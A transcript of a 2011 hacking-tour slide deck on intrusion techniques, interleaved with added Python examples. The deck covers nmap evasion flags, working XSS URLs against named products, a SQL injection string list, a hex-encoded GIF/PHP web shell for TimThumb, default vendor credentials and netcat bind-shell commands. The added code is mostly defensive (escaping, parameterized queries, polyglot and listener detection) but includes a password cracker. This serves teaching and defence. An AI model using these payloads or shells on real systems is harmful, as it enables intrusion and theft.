"intrusion techniques (open source tools)" por ewerson guimarães por

32
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011 Intrusion Techniques DcLabs Hacking Tour 2011

Upload: workshop-blog-seginfo

Post on 05-Dec-2014

TRANSCRIPT

Page 1:

Intrusion Techniques
DcLabs Hacking Tour 2011

Page 2:

Agenda

Fingerprinting
Web bugs
Backdoors
Brute force
Shellcode
Exploits
Scanners

Page 3:

FingerPrint

The best-known tool for discovering operating systems, services, devices and more: NMAP (Network Mapper)

Basic commands:

nmap host (basic scan)
nmap -sV host (service version detection)
nmap -P0 host (skip host discovery: do not wait for an ICMP echo reply before scanning; current Nmap spells this option -Pn)
nmap -O host (try to identify the O.S. version)
nmap -f host (fragment packets for firewall/IDS/IPS evasion)

Grabs information about a target host. Ex: it is used to identify the operating system and/or service (daemon) version number from the unique characteristics of the host's TCP/IP responses.

Page 4:

Passive FingerPrint

• TTL - the Time To Live value the operating system sets on outbound packets

• Window Size - the TCP window size the operating system sets

• DF - whether the operating system sets the Don't Fragment bit

• TOS - whether the operating system sets the Type of Service field, and if so, to what value
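Added example (Python), not code from the slides: a passive fingerprinter in the style of p0f that pulls the four fields above out of a raw IPv4/TCP packet and matches them against a signature table. The SIGNATURES table is an illustrative assumption written for this example, not a vetted database; build_syn() constructs the sample packets so the code runs without a capture (checksums are left at zero). The hop-distance estimate shows the caveat the slide leaves implicit: the TTL on the wire has already been decremented once per router, so it must be rounded up to a common starting value before it is compared.

```python
"""Passive TCP/IP fingerprinting from a captured SYN (added example, not from the slides)."""
import struct

# (initial TTL, window, DF set, TOS) -> label.  Assumed values in the spirit of p0f;
# verify each entry against your own captures before relying on it.
SIGNATURES = {
    (64, 5840, True, 0x00): "Linux 2.6 (ttl 64, win 5840, DF)",
    (64, 65535, True, 0x00): "FreeBSD / macOS (ttl 64, win 65535, DF)",
    (128, 65535, True, 0x00): "Windows XP/2003 (ttl 128, win 65535, DF)",
    (128, 8192, True, 0x00): "Windows 7/2008 (ttl 128, win 8192, DF)",
    (255, 4128, False, 0x00): "Cisco IOS (ttl 255, win 4128, no DF)",
}


def initial_ttl(observed: int) -> int:
    """Each router hop decrements TTL, so round the observed value up to the
    nearest common starting value to recover what the sender set."""
    return next(t for t in (32, 64, 128, 255) if t >= observed)


def parse_fields(pkt: bytes) -> dict:
    """Extract TTL, window, DF, TOS and the SYN/ACK flags from an IPv4/TCP packet."""
    if len(pkt) < 20:
        raise ValueError("too short for an IPv4 header")
    ver_ihl, tos, _total, _ident, flags_frag, ttl, proto = struct.unpack_from("!BBHHHBB", pkt, 0)
    if ver_ihl >> 4 != 4:
        raise ValueError("not IPv4")
    if proto != 6:
        raise ValueError("not TCP")
    ihl = (ver_ihl & 0x0F) * 4
    if len(pkt) < ihl + 20:
        raise ValueError("truncated TCP header")
    _sport, _dport, _seq, _ack, off_flags, window = struct.unpack_from("!HHIIHH", pkt, ihl)
    tcp_flags = off_flags & 0x01FF
    return {
        "ttl": ttl,
        "window": window,
        "df": bool(flags_frag & 0x4000),  # DF is the middle bit of the 3-bit IP flags field
        "tos": tos,
        "syn": bool(tcp_flags & 0x02) and not (tcp_flags & 0x10),
    }


def fingerprint(pkt: bytes) -> tuple:
    """Return (label, estimated hop distance) for an initial SYN packet."""
    f = parse_fields(pkt)
    if not f["syn"]:
        raise ValueError("only the initial SYN carries the OS's default window size")
    start = initial_ttl(f["ttl"])
    label = SIGNATURES.get((start, f["window"], f["df"], f["tos"]), "unknown")
    return label, start - f["ttl"]


def build_syn(ttl, window, df=True, tos=0):
    """Constructed test input: minimal IPv4 header + TCP SYN, no options, zero checksums."""
    flags_frag = 0x4000 if df else 0
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, tos, 40, 0x1234, flags_frag, ttl, 6, 0,
                     bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    tcp = struct.pack("!HHIIHHHH", 40000, 80, 0, 0, (5 << 12) | 0x02, window, 0, 0)
    return ip + tcp


if __name__ == "__main__":
    for pkt in (build_syn(51, 5840), build_syn(117, 8192), build_syn(64, 1024, df=False)):
        print(fingerprint(pkt))
```

To use it on real traffic, feed it the IP payload of SYN packets from a capture; the window size is only meaningful on the first SYN, which is why fingerprint() refuses anything else.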

Page 5:

FingerPrint Matrix:

Page 6:

FingerPrint: U. Bourne

Page 7:

FingerPrint

In BackTrack Linux you can find many tools for fingerprinting

Http://www.backtrack-linux.com

Page 8:

Web Vulnerability

Cross-Site Scripting (XSS) – Reflected / Stored

SQL-Injection

PHP (LFI / RFI / AFU / RCE), where AFU is arbitrary file upload

These vulnerabilities are initially exploited through malicious browser requests, compromising the target in a matter of minutes

Page 9:

Web Vulnerability

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users.

Spekx – Knowledge Base: http://server/pls/ksp_acesso.login_script?p_time=%221%22%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

LMS Web Ensino – TOTVS: http://site/lms/sistema/webensino/index.php?modo=resbusca_biblioteca&pChave=a%22%2F%3E+%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&Submit=Buscar
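Added example (Python), not code from the slides or from the products named above: it URL-decodes the two payloads from the slide's URLs, reflects them through a made-up search results page the way a vulnerable application would, and then through the same page with output encoding. The form markup and the parameter contexts are assumptions chosen to reproduce the `a"/> <script>` attribute break-out the TOTVS payload is built for; nothing here contacts a server.

```python
"""Reflected XSS: the slide's payloads against unescaped and escaped output (added example)."""
import html
from html.parser import HTMLParser
from urllib.parse import urlparse, unquote_plus

# The two URLs printed on the slide and the parameter each payload lives in.
SLIDE_URLS = {
    "spekx": ("http://server/pls/ksp_acesso.login_script?p_time=%221%22%3Cscript%3E"
              "alert%28document.cookie%29;%3C/script%3E", "p_time"),
    "totvs": ("http://site/lms/sistema/webensino/index.php?modo=resbusca_biblioteca"
              "&pChave=a%22%2F%3E+%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&Submit=Buscar",
              "pChave"),
}


def payload_from(url: str, param: str) -> str:
    """Return the decoded value of one query parameter (split done by hand so a ';'
    inside the payload is never treated as a separator)."""
    for pair in urlparse(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key == param:
            return unquote_plus(value)
    raise KeyError(param)


def render_results(term: str, escape: bool) -> str:
    """Made-up search page that reflects the term into an attribute and into a text node.
    With escape=False this is the vulnerable application; with escape=True the fixed one."""
    v = html.escape(term, quote=True) if escape else term
    return (f'<form><input type="text" name="pChave" value="{v}"/></form>'
            f'<p>Results for {v}</p>')


class _ScriptCounter(HTMLParser):
    """Counts <script> elements the way a browser would parse them."""

    def __init__(self):
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1


def script_elements(markup: str) -> int:
    p = _ScriptCounter()
    p.feed(markup)
    p.close()
    return p.scripts


if __name__ == "__main__":
    for name, (url, param) in SLIDE_URLS.items():
        payload = payload_from(url, param)
        print(name, repr(payload),
              "vulnerable:", script_elements(render_results(payload, escape=False)),
              "escaped:", script_elements(render_results(payload, escape=True)))
```

html.escape(quote=True) turns `"` into `&quot;` and `<` into `&lt;`, so the value can neither close the attribute nor open a tag; the original text is still visible to the user, only now as data. Encoding must match the context (attribute, text, JavaScript string, URL), which is why a single global filter on input is not a substitute.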

Page 10:

Web Vulnerability

Reflected / Stored XSS

DEMO

Page 11:

Web Vulnerability

Page 12:

What is the impact?

Why?

Examples?

Page 13:

Web Vulnerability

SQL-Injection

It occurs when the attacker can insert a series of SQL statements into a 'query' by manipulating the data the application takes as input.

SELECT fields FROM table WHERE field = '[email protected]';

Inject string: some' OR 'x'='x

SELECT fields FROM table WHERE field = 'some' OR 'x'='x';

Common injection strings:

admin'--
" or 0=0 #
' or 1=1--
hi' or 'a'='a
' or 0=0 --
or 0=0 #
" or 1=1--
hi') or ('a'='a
" or 0=0 --
' or 'x'='x
or 1=1--
hi") or ("a"="a
or 0=0 --
" or "x"="x
' or a=a--
');Drop table x;--
' or 0=0 #
') or ('x'='x
hi" or 1=1 --
') or ('a'='a
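Added example (Python with the standard sqlite3 module), not code from the slides: the slide's `some' OR 'x'='x` and `admin'--` strings run against a query built by string concatenation, exactly as on the slide, and then against the same query with bound parameters. The users table, its rows and the column names are constructed for the demo.

```python
"""SQL injection: concatenated query vs. parameterized query (added example)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two accounts with plaintext passwords (demo only)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "S3cret!"), ("bob", "hunter2")])
    return db


def find_user_vulnerable(db, value: str) -> list:
    """The slide's pattern: SELECT fields FROM table WHERE field = '<input>' built by concatenation.
    some' OR 'x'='x turns the WHERE clause into a tautology and returns every row."""
    sql = f"SELECT username FROM users WHERE username = '{value}'"
    return [row[0] for row in db.execute(sql)]


def find_user_safe(db, value: str) -> list:
    """Same query with a bound parameter: the quote in the input is data, not syntax."""
    return [row[0] for row in
            db.execute("SELECT username FROM users WHERE username = ?", (value,))]


def login_vulnerable(db, username: str, password: str) -> bool:
    """Two-field login check; admin'-- comments out the password comparison."""
    sql = (f"SELECT 1 FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return db.execute(sql).fetchone() is not None


def login_safe(db, username: str, password: str) -> bool:
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    print(find_user_vulnerable(db, "some' OR 'x'='x"))   # every user
    print(find_user_safe(db, "some' OR 'x'='x"))         # nobody
    print(login_vulnerable(db, "admin'--", "wrong"))     # True: password never checked
    print(login_safe(db, "admin'--", "wrong"))           # False
```

The stacked `');Drop table x;--` string from the list does not work through sqlite3's execute(), which refuses more than one statement per call; against drivers that allow multi-statement execution the DROP runs. Parameterization fixes all of these at once because the database receives the query text and the values separately.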

Page 14:

SQL-Injection

LIVE DEMO: OCOMON – Throwing fudge at the fan

Page 15:

Web Vulnerability

CGI/PHP Command Injection

It occurs when the attacker inserts a series of commands by exploiting vulnerable CGI/PHP scripts

OneorZero – AFU + LFI

http://server/oneorzero/index.php?controller=../[FILE].php

WordPress TimThumb (Theme) Plugin – RCE

\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00

(The byte string above decodes to a valid 1x1 GIF89a image followed by <?php @eval($_GET['cmd']); ?>: a file that passes image checks and runs as PHP when it is served through the interpreter.)
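Added example (Python), not TimThumb's or any image library's code: TIMTHUMB_PAYLOAD is the byte string printed on the slide. A magic-byte check, which is what an "is this really an image?" filter usually amounts to, accepts it because it is a valid GIF; a check that walks the GIF block structure and rejects both trailing data after the 0x3B trailer and a PHP open tag anywhere in the file does not. The GIF walker below was written for this example and handles only what it needs to (header, colour tables, extensions, image blocks).

```python
"""GIF/PHP polyglot detection for the TimThumb-style payload (added example)."""
import struct

# Byte string from the slide: 1x1 GIF89a, trailer, then "<?php @eval($_GET['cmd']); ?>"
TIMTHUMB_PAYLOAD = (
    b"\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xFF\xFF\xFF\x00\x00\x00"
    b"\x21\xF9\x04\x01\x00\x00\x00\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00"
    b"\x02\x02\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65\x76\x61\x6C"
    b"\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00"
)


def naive_is_gif(data: bytes) -> bool:
    """Magic-byte check only: this is what the polyglot is designed to pass."""
    return data[:6] in (b"GIF87a", b"GIF89a")


def _skip_subblocks(data: bytes, pos: int) -> int:
    """Data sub-blocks are <len><bytes>... ended by a zero-length block."""
    while True:
        if pos >= len(data):
            raise ValueError("truncated sub-block chain")
        n = data[pos]
        pos += 1
        if n == 0:
            return pos
        pos += n


def gif_end(data: bytes) -> int:
    """Walk the GIF structure and return the offset just past the 0x3B trailer."""
    if not naive_is_gif(data):
        raise ValueError("not a GIF")
    _w, _h, packed, _bg, _aspect = struct.unpack_from("<HHBBB", data, 6)
    pos = 13
    if packed & 0x80:                                   # global colour table present
        pos += 3 * (2 ** ((packed & 0x07) + 1))
    while True:
        if pos >= len(data):
            raise ValueError("no trailer found")
        block = data[pos]
        pos += 1
        if block == 0x3B:                               # trailer
            return pos
        if block == 0x21:                               # extension: label byte, then sub-blocks
            pos = _skip_subblocks(data, pos + 1)
        elif block == 0x2C:                             # image descriptor
            _l, _t, _iw, _ih, ipacked = struct.unpack_from("<HHHHB", data, pos)
            pos += 9
            if ipacked & 0x80:                          # local colour table
                pos += 3 * (2 ** ((ipacked & 0x07) + 1))
            pos = _skip_subblocks(data, pos + 1)        # +1 skips the LZW minimum code size
        else:
            raise ValueError(f"unexpected block 0x{block:02x} at offset {pos - 1}")


def trailing_bytes(data: bytes) -> bytes:
    """Whatever follows the trailer: for the slide's payload, the PHP code."""
    return data[gif_end(data):]


def strict_is_gif(data: bytes) -> bool:
    """Structure must end exactly at the trailer, and no PHP open tag may appear anywhere:
    PHP executes <?php wherever it occurs, including inside a GIF comment extension."""
    try:
        end = gif_end(data)
    except (ValueError, struct.error):
        return False
    return end == len(data) and b"<?" not in data


if __name__ == "__main__":
    print(naive_is_gif(TIMTHUMB_PAYLOAD), strict_is_gif(TIMTHUMB_PAYLOAD))
    print(trailing_bytes(TIMTHUMB_PAYLOAD))
```

The structural check is a useful second line, but the real fix for this class of bug is never to let an uploaded or fetched file be served through the PHP interpreter: store it under a name and directory the web server treats as static content.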

Page 16:

Default/Weak passwords

Default passwords are set by the manufacturer/developer and are not changed after installation/configuration.

As supplied by the system vendor and meant to be changed at installation time (nobody does this)

Ex: 3Com switch: User: security - Pass: security

Firebird: User: sysdba - Pass: masterkey

Weak: passwords that are easily guessed or keyboard sequences. Ex: 123456 - love - home phone number - birthday - etc...

Page 17:

Brute Force

It consists of trying combinations of characters, numbers and symbols, wordlists and/or string generators to crack a password

Ex: John the Ripper, Hydra (SSH brute force)
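Added example (Python), not code from the slides or from John the Ripper: a small offline cracker that runs the three passes the two slides describe in order, vendor defaults first (the 3Com and Firebird pairs from the slide), then a wordlist of weak passwords, then an incremental digit mask as a "string generator". The hash format (salted SHA-256), the salts, the users and the wordlist are constructed for the demo; production password stores should use a slow KDF such as bcrypt, scrypt or Argon2, which is exactly what makes a loop like this expensive.

```python
"""Default-credential, wordlist and mask attacks against a constructed hash store (added example)."""
import hashlib
import itertools
import string

# From the slide: default credentials that are routinely left in place (user -> password).
DEFAULT_CREDS = {"security": "security", "sysdba": "masterkey"}

# Constructed wordlist of "weak" passwords in the sense of the slide.
WORDLIST = ["123456", "love", "password", "qwerty", "admin", "letmein"]


def sha256_salted(salt: str, password: str) -> str:
    return hashlib.sha256((salt + password).encode()).hexdigest()


# Constructed shadow-like store: user -> (salt, hash).  Comments say which pass should win.
SAMPLE_STORE = {
    "sysdba": ("n1", sha256_salted("n1", "masterkey")),   # vendor default never changed
    "alice": ("n2", sha256_salted("n2", "love")),          # weak dictionary word
    "carol": ("n3", sha256_salted("n3", "4711")),          # 4-digit PIN: mask pass
    "dave": ("n4", sha256_salted("n4", "Tr0ub4dor&3")),    # survives all three passes
}


def try_candidates(store: dict, pending: set, candidates_for) -> dict:
    """Test candidate passwords for every still-uncracked user; return user -> password hits."""
    hits = {}
    for user in sorted(pending):
        salt, digest = store[user]
        for cand in candidates_for(user):
            if sha256_salted(salt, cand) == digest:
                hits[user] = cand
                break
    return hits


def mask_candidates(charset: str, max_len: int):
    """Incremental mode: every string over charset up to max_len characters."""
    for n in range(1, max_len + 1):
        for tup in itertools.product(charset, repeat=n):
            yield "".join(tup)


def crack(store: dict, wordlist=WORDLIST, mask_charset=string.digits, mask_len=4) -> dict:
    """Run the passes cheapest-first; return user -> (password, pass that found it)."""
    pending = set(store)
    found = {}
    passes = [
        ("default", lambda u: [DEFAULT_CREDS[u]] if u in DEFAULT_CREDS else []),
        ("wordlist", lambda u: wordlist),
        ("mask", lambda u: mask_candidates(mask_charset, mask_len)),
    ]
    for name, gen in passes:
        hits = try_candidates(store, pending, gen)
        for user, pw in hits.items():
            found[user] = (pw, name)
        pending -= set(hits)
        if not pending:
            break
    return found


if __name__ == "__main__":
    for user, (pw, how) in crack(SAMPLE_STORE).items():
        print(f"{user}: {pw!r} (found by {how} pass)")
```

The ordering is the point: defaults and a short wordlist cost almost nothing and catch the accounts the slide complains about, while the mask pass grows exponentially with length and charset, so a password that is long and outside the wordlist (dave) is never reached.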

Page 18:

Brute Force

DirBuster - DirBuster is a multi-threaded Java application designed to brute force directory and file names on web/application servers

Page 19:

Exploits

Kinds of exploits:

Local: Usually the objective of a local exploit is to elevate the user's privileges on the machine as close as possible to root (uid=0) or Administrator. They are written to exploit kernel bugs or SUID binaries.

Remote: Works over a network connection and exploits the vulnerable target without any prior access to it.

www.securityfocus.com
www.secunia.com
www.exploit-db.com

0-days: Usually an unpublished exploit for a newly found vulnerability. You can buy them! $$$$$

Page 20:

Exploits

If the kernel was patched? Will we cry?

Alexos =>

Page 21:

Exploits

No!!!! Fuck him!!! We have other ways to pwn the box

GNU C library dynamic linker

SUIDs

Etc...

Page 22:

Backdoors/RootKits

Used to maintain access to the system

We can use Netcat for this purpose:

nc -vv -l -p 5555 (plain listener on port 5555)
nc -vv -l -p 5555 -e /bin/bash (listener that hands a shell to whoever connects: a bind shell)
nc <ip> <port> (connect to the listener from the attacker's side)

Note: -e exists only in netcat builds compiled with that option (the traditional nc and Ncat); OpenBSD netcat does not have it.
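Added example (Python), not from the slides: the defender's check for the bind shell above. SAMPLE_SS is constructed to look like `ss -ltnp` output on a host where `nc -vv -l -p 5555 -e /bin/bash` is running next to sshd and nginx; it is not a real capture. EXPECTED_LISTENERS is an assumed per-host baseline, and the check flags any listening socket that is either outside that baseline or owned by a process that can spawn a shell.

```python
"""Flag netcat-style listeners in `ss -ltnp` output (added example, constructed sample)."""
import re

# Constructed to mimic `ss -ltnp`; the nc line is the slide's bind shell.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      511    0.0.0.0:80          0.0.0.0:*         users:(("nginx",pid=1033,fd=6))
LISTEN 0      1      0.0.0.0:5555        0.0.0.0:*         users:(("nc",pid=4242,fd=3))
LISTEN 0      5      [::]:8000           [::]:*            users:(("python3",pid=2201,fd=3))
"""

# Assumed baseline for this host: port -> process that is allowed to own it.
EXPECTED_LISTENERS = {22: "sshd", 80: "nginx"}

# Programs that commonly front a shell when found listening.
SHELL_CAPABLE = {"nc", "ncat", "netcat", "socat", "sh", "bash", "dash",
                 "python", "python3", "perl"}

LINE_RE = re.compile(
    r'^LISTEN\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+users:\(\("([^"]+)",pid=(\d+)')


def parse_listeners(text: str) -> list:
    """One dict per LISTEN line: address, port, owning process name and pid."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            addr, port, proc, pid = m.groups()
            out.append({"addr": addr, "port": int(port), "process": proc, "pid": int(pid)})
    return out


def suspicious_listeners(text: str, expected=EXPECTED_LISTENERS) -> list:
    """Listeners outside the baseline or owned by a shell-capable process, with reasons."""
    findings = []
    for lst in parse_listeners(text):
        reasons = []
        if expected.get(lst["port"]) != lst["process"]:
            reasons.append("not in baseline")
        if lst["process"] in SHELL_CAPABLE:
            reasons.append("shell-capable process owns the socket")
        if reasons:
            findings.append({**lst, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in suspicious_listeners(SAMPLE_SS):
        print(f'port {f["port"]}: {f["process"]} (pid {f["pid"]}) - {"; ".join(f["reasons"])}')
```

On a live host, replace SAMPLE_SS with the stdout of `subprocess.run(["ss", "-ltnp"], capture_output=True, text=True)`; the baseline is the part worth maintaining, since a listener on a "normal" port owned by the wrong binary is the case a port-only check misses.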

RootKits

The main purpose of a rootkit is to hide the attacker's presence by replacing vital system binaries on the target's system. Examples: hide files (matching given strings), run a command when a string matches, hide processes, hide open ports, and others.

Page 23:

Scanners/Fuzzers

There are 2 types of scanners: specific ones, written for a specific vulnerability class (BSQLHacker, SQLMAP), and generic ones, written for various kinds of vulnerabilities. Generic scanners use known service banners/strings to locate potential targets/vulnerabilities.

W3af
Nessus

Page 24:

Scanners/Fuzzers

Page 25:

Scanners/Fuzzers

Page 26:

Sniffers

A sniffer monitors and analyzes network traffic. Some of these packets may contain critical information (such as logins, passwords and other juicy info).

Wireshark

Page 27:

MetaSploit

Page 28:

MetaSploit

Let's Fuck Windows?

Page 29:

Hardening your server

HnTool is an open source (GPLv2) hardening tool for Unix. It scans your system for vulnerabilities or problems in configuration files, giving you a quick overview of the security status of your system.

Page 30:

Questions?

Page 31:

Page 32:

Contact

Crash - [email protected]

IRC: irc.freenode.net #dclabs

Twitter: @crashbrz